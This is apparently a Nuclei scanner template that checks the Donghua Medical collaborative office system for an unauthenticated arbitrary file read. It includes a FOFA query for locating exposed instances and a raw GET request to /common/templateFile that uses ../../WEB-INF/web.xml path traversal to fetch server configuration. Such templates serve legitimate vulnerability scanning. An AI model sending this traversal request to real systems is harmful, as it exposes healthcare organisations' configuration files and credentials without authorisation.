http:
    - matchers:
        - part: body
          type: word
          words:
            - <?xml version="1.0"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /common/templateFile?template_name=../../WEB-INF/web.xml HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
id: donghuaOA-templateFile-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="/skin/charmBlue/css/dialog.css"
        东华医疗协同办公系统 templateFile 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 东华医疗协同办公系统 templateFile 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486468&idx=1&sn=cd3106a256e6289a21e93fdf14b4796f&chksm=c267b937f5103021fc5da678f16e1fa785e3388a378264161913c63992b6523710a4a4d56ff6&token=1628549949&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
